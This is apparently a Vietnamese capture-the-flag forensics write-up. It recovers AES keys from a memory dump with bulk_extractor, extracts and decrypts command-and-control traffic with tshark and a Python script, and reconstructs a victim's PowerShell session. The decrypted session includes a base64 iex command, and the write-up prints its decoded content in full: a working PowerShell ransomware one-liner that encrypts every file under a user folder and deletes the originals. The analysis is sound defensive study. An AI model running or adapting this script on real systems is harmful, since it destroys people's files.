Bulk_extractor là một công cụ khai thác pháp y kỹ thuật số hiệu suất cao. Nó giúp quét nhanh các loại đầu vào như hình ảnh đĩa, tệp hoặc thư mục và trích xuất thông tin có cấu trúc như email, số thẻ tín dụng, ảnh JPEG và đoạn JSON mà không cần phân tích hệ thống tệp. Kết quả được lưu dưới dạng tệp văn bản dễ dàng kiểm tra hoặc sử dụng cho các bước xử lý pháp y khác. Bulk_extractor cũng tạo biểu đồ về các đặc điểm như tìm kiếm Google và địa chỉ email, rất hữu ích trong điều tra và thực thi pháp luật.
Không giống như các công cụ pháp y kỹ thuật số khác, bulk_extractor thăm dò từng byte dữ liệu để kiểm tra xem liệu có phải là phần đầu của chuỗi có thể giải nén hoặc giải mã được hay không. Nếu đúng, dữ liệu sau khi giải mã sẽ được kiểm tra lại theo cách đệ quy. Do đó, bulk_extractor có thể tìm thấy những dữ liệu như JPEG được mã hóa BASE64 và các đối tượng JSON nén mà các công cụ khôi phục dữ liệu truyền thống thường bỏ sót.
  • Sau khi chạy ta thu được file tên là aes_keys, bên trong bao gồm tất cả các key AES được trích xuất từ file DMP
  • image
    
    38249768	74 f4 90 6e 54 93 55 8d 1f e7 49 34 50 85 52 3d	AES128
    38310248	19 67 e8 d7 51 90 d1 cf b6 c5 4e 1d 24 e8 ce 5c 63 af b8 69 e1 f5 d3 16 69 1a 12 18 7d ea 80 96	AES256
    38310904	5e 91 2d be 74 0c 3b 61 4f 88 31 11 07 89 18 65 0f 94 ef b2 88 84 6b 2f 27 c0 a0 8b 5f 3b c7 fb	AES256
    41295104	19 67 e8 d7 51 90 d1 cf b6 c5 4e 1d 24 e8 ce 5c 63 af b8 69 e1 f5 d3 16 69 1a 12 18 7d ea 80 96	AES256
    41295760	5e 91 2d be 74 0c 3b 61 4f 88 31 11 07 89 18 65 0f 94 ef b2 88 84 6b 2f 27 c0 a0 8b 5f 3b c7 fb	AES256
    43772072	74 f4 90 6e 54 93 55 8d 1f e7 49 34 50 85 52 3d	AES128
    
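  • Bây giờ ta đã có các key ứng viên (1 key AES128 và 2 key AES256, mỗi key xuất hiện ở hai offset). Script bên dưới dùng key AES128 74 f4 90 6e 54 93 55 8d 1f e7 49 34 50 85 52 3d; bắt đầu giải mã các dữ liệu thôi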
  • Trước tiên ta phải lấy data được gửi đi và nhận về với tshark.
  • Đầu tiên là dữ liệu máy victim gửi đi : tshark -r c73942da210e547b5addab8e46dc5ce2.pcapng -Y "tcp.dstport == 8888 && data.data" -Tfields -e data.data > data2.txt
  • Mình sẽ viết script giải mã các dữ liệu này:
  • Tiếp theo là dữ liệu máy victim nhận : tshark -r c73942da210e547b5addab8e46dc5ce2.pcapng -Y "tcp.srcport == 8888 && data.data" -Tfields -e data.data > data1.txt

  • Mình sẽ viết script giải mã tất cả
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
# AES-128 key: the 16-byte AES128 candidate that bulk_extractor listed in aes_keys,
# written here as spaced hex the way that file prints it.
key = bytes.fromhex("74 f4 90 6e 54 93 55 8d 1f e7 49 34 50 85 52 3d")
# Fixed IV: the string hard-coded in the decompiled Run method.
iv = b"Z6LhFDiCgfOB8HNK"
def aes_decrypt(ciphertext, key, iv):
    """Decrypt one AES-CBC message and remove its block padding.

    Args:
        ciphertext: raw ciphertext bytes of a single message.
        key: AES key bytes.
        iv: 16-byte initialisation vector.

    Returns:
        The plaintext bytes with padding stripped.

    A fresh cipher object is built on every call, so each message is decrypted
    as an independent CBC stream starting from ``iv``. ``unpad`` is called with
    its default padding style and rejects data whose padding is not valid.
    """
    cbc = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cbc.decrypt(ciphertext), AES.block_size)
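# Load the two tshark exports; each non-empty line is the hex payload of one TCP packet.
#   data1.txt: packets coming from port 8888 (commands sent to the victim)
#   data2.txt: packets going to port 8888 (command output sent by the victim)
with open("data2.txt", "r") as file2:
    data2 = [line.strip() for line in file2 if line.strip()]
with open("data1.txt", "r") as file1:
    data1 = [line.strip() for line in file1 if line.strip()]

# Walk both captures in parallel so each command is printed before its output.
# Iterating up to the longer list keeps trailing packets visible instead of
# dropping them or failing with IndexError when the two files differ in length.
for i in range(max(len(data1), len(data2))):
    if i < len(data1):
        # Commands are bare CBC ciphertext: Run decrypts exactly what it read.
        try:
            print(aes_decrypt(bytes.fromhex(data1[i]), key, iv).decode('utf-8'))
        except ValueError as err:
            # Bad hex, bad padding and bad UTF-8 all raise ValueError (or a subclass).
            print(f"[!] data1 line {i + 1}: not decryptable as a single message ({err})")
    if i < len(data2):
        try:
            packet = bytes.fromhex(data2[i])
            # Replies start with the 4-byte length produced by BitConverter.GetBytes
            # (little-endian on the AMD64 victim), followed by the ciphertext.
            declared = int.from_bytes(packet[:4], "little")
            body = packet[4:]
            if declared != len(body):
                # Probably a reply split across TCP segments, or the unframed
                # plain-text exception message; flag it instead of trusting the slice.
                print(f"[!] data2 line {i + 1}: length prefix {declared} != payload {len(body)}")
            print(aes_decrypt(body, key, iv).decode('utf-8'))
        except ValueError as err:
            print(f"[!] data2 line {i + 1}: not decryptable as a single message ({err})")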
  • Và đây là đầu ra
whoami
bob-pc\bob

pwd

Path        
----        
C:\Users\bob



gci Env:

Name                           Value                                                                                   
----                           -----                                                                                   
ALLUSERSPROFILE                C:\ProgramData                                                                          
APPDATA                        C:\Users\bob\AppData\Roaming                                                            
CommonProgramFiles             C:\Program Files\Common Files                                                           
CommonProgramFiles(x86)        C:\Program Files (x86)\Common Files                                                     
CommonProgramW6432             C:\Program Files\Common Files                                                           
COMPUTERNAME                   BOB-PC                                                                                  
ComSpec                        C:\Windows\system32\cmd.exe                                                             
DriverData                     C:\Windows\System32\Drivers\DriverData                                                  
flag_part                      BtSCTF{Sti11                                                                            
HOMEDRIVE                      C:                                                                                      
HOMEPATH                       \Users\bob                                                                              
LOCALAPPDATA                   C:\Users\bob\AppData\Local                                                              
LOGONSERVER                    \\BOB-PC                                                                                
NUMBER_OF_PROCESSORS           4                                                                                       
OneDrive                       C:\Users\bob\OneDrive                                                                   
OS                             Windows_NT                                                                              
Path                           C:\Program Files\PowerShell\7;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem...
PATHEXT                        .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL                              
POWERSHELL_DISTRIBUTION_CHA... MSI:Windows 10 Pro                                                                      
POWERSHELL_TELEMETRY_OPTOUT    1                                                                                       
PROCESSOR_ARCHITECTURE         AMD64                                                                                   
PROCESSOR_IDENTIFIER           AMD64 Family 23 Model 113 Stepping 0, AuthenticAMD                                      
PROCESSOR_LEVEL                23                                                                                      
PROCESSOR_REVISION             7100                                                                                    
ProgramData                    C:\ProgramData                                                                          
ProgramFiles                   C:\Program Files                                                                        
ProgramFiles(x86)              C:\Program Files (x86)                                                                  
ProgramW6432                   C:\Program Files                                                                        
PSModulePath                   C:\Users\bob\Documents\PowerShell\Modules;C:\Program Files\PowerShell\Modules;c:\prog...
PUBLIC                         C:\Users\Public                                                                         
SESSIONNAME                    Console                                                                                 
SystemDrive                    C:                                                                                      
SystemRoot                     C:\Windows                                                                              
TEMP                           C:\Users\bob\AppData\Local\Temp                                                         
TMP                            C:\Users\bob\AppData\Local\Temp                                                         
USERDOMAIN                     BOB-PC                                                                                  
USERDOMAIN_ROAMINGPROFILE      BOB-PC                                                                                  
USERNAME                       bob                                                                                     
USERPROFILE                    C:\Users\bob                                                                            
windir                         C:\Windows                                                                              
WSLENV                         WT_SESSION:WT_PROFILE_ID:                                                               
WT_PROFILE_ID                  {574e775e-4f2a-5b96-ac1e-a2962a402336}                                                  
WT_SESSION                     83c660f8-e0fe-42b5-a2d9-23519f2fa432                                                    



gci C:\Users\bob


    Directory: C:\Users\bob


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-r---         4/29/2024   2:59 PM                Contacts                                                             
d-r---         4/30/2024  12:26 PM                Desktop                                                              
d-r---         4/30/2024  12:26 PM                Documents                                                            
d-r---         4/29/2024   3:47 PM                Downloads                                                            
d-r---         4/29/2024   8:54 PM                Favorites                                                            
d-r---         4/29/2024   8:54 PM                Links                                                                
d-r---         4/29/2024   2:59 PM                Music                                                                
d-r---         3/17/2024   1:21 PM                OneDrive                                                             
d-r---         4/29/2024   2:59 PM                Pictures                                                             
d-r---         4/29/2024   2:59 PM                Saved Games                                                          
d-r---         4/29/2024   8:54 PM                Searches                                                             
d-r---         4/29/2024   2:59 PM                Videos                                                               



gci C:\Users\bob\Documents


    Directory: C:\Users\bob\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/29/2024   3:30 PM          20078 freeflag.docm                                                        



gci C:\Users\bob\Desktop


    Directory: C:\Users\bob\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/29/2024   3:09 PM          20810 cat.jpg                                                              
-a----         4/30/2024  12:27 PM            169 todo_important.txt                                                   



iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')))

gci C:\Users\bob\Desktop


    Directory: C:\Users\bob\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/30/2024  12:33 PM          20816 cat.jpg.enc                                                          
-a----         4/30/2024  12:33 PM            176 todo_important.txt.enc                                               



[Convert]::ToBase64String([IO.File]::ReadAllBytes((gci "${Env:USERPROFILE}\Desktop\todo_important.txt.enc")))
1rlR6HY6oRjdSfnHgqBXsPmynKA+STdghcT3tvM1JqOACFb7C9tdd1lTrfr2xxmKe72f/I4TCUx9y2RftjCnCZcN6TwfGJaRwKxbvfp7x1zn7Im4mczMfT7n05gvfrPgZzLKyBQlMFou1FsDL2Xgc8etlub0DWu70Nztl4cncB3edgz/CHqv+YwjbElE3Z0yz7Ne0uf5Vb1SFkQZmVo9tVIzOPvS6MO+EIRMxKiPIHs=

  • image
  • Tại đây ta tìm thấy 1 phần của flag
  • Cuộn xuống 1 xíu ta sẽ thấy lệnh iex thực thi 1 chuỗi base64, decode nó ta được 1 script PowerShell mã hoá file bằng AES.
  • image
# Decoded payload of the base64 `iex` command seen in the captured session, reproduced unchanged.
# Behaviour: enumerates every file under C:\Users\bob recursively, streams each one through an
# AES encryptor into "<original path>.enc", then deletes the original with Remove-Item.
# Key and IV are hard-coded 16-character UTF-8 strings (16 bytes -> AES-128), and the same IV is
# reused for every file. Mode and Padding are never set, so the .NET defaults (CBC, PKCS7) apply;
# the directory listings agree: 169 -> 176 and 20810 -> 20816 bytes, each the next multiple of 16.
# Recovery: since both secrets sit in the script, any .enc file can be decrypted offline with
# AES-CBC using this key and IV.
# Detection: PowerShell script-block logging (event ID 4104), if enabled, records this decoded
# text even though it arrived base64-encoded through iex.
$folder='C:\Users\bob'; Add-Type -AssemblyName System.Security; $provider = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $provider.Key = [System.Text.Encoding]::UTF8.GetBytes("_w4y_b3tt3r_th4n"); $provider.IV = [System.Text.Encoding]::UTF8.GetBytes("0398y9xlczsmrfy8"); Get-ChildItem $folder -File -Recurse | ForEach-Object { $input = New-Object IO.FileStream($_.FullName, [IO.FileMode]::Open, [IO.FileAccess]::Read); $filename = "$($_.FullName).enc"; $output = [System.IO.File]::Create($filename); $cs = New-Object System.Security.Cryptography.CryptoStream($output, $provider.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write); $input.CopyTo($cs); $cs.Close(); $output.Close(); $input.Close(); Remove-Item $_}; $provider.Dispose();
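  • Tại đây nó sử dụng key và iv lần lượt là “_w4y_b3tt3r_th4n” và “0398y9xlczsmrfy8” để mã hoá mọi file trong C:\Users\bob thành file có đuôi .enc rồi xoá file gốc. Key dài 16 byte nên đây là AES-128; script không đặt Mode nên .NET dùng mặc định là CBC.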
  • Kéo xuống dưới thêm tí nữa ta thấy nội dung file todo_important.txt.enc (file đã bị mã hoá) được đọc ra và in dưới dạng base64
  • image
  • Dùng cyberchef để giải mã (From Base64 → AES Decrypt, mode CBC, key và IV ở dạng UTF8 như trên) ta được phần 2 của flag
  • image

    Flag : BtSCTF{Sti11McAf33:D_72844187}

This post is licensed under CC BY 4.0 by the author.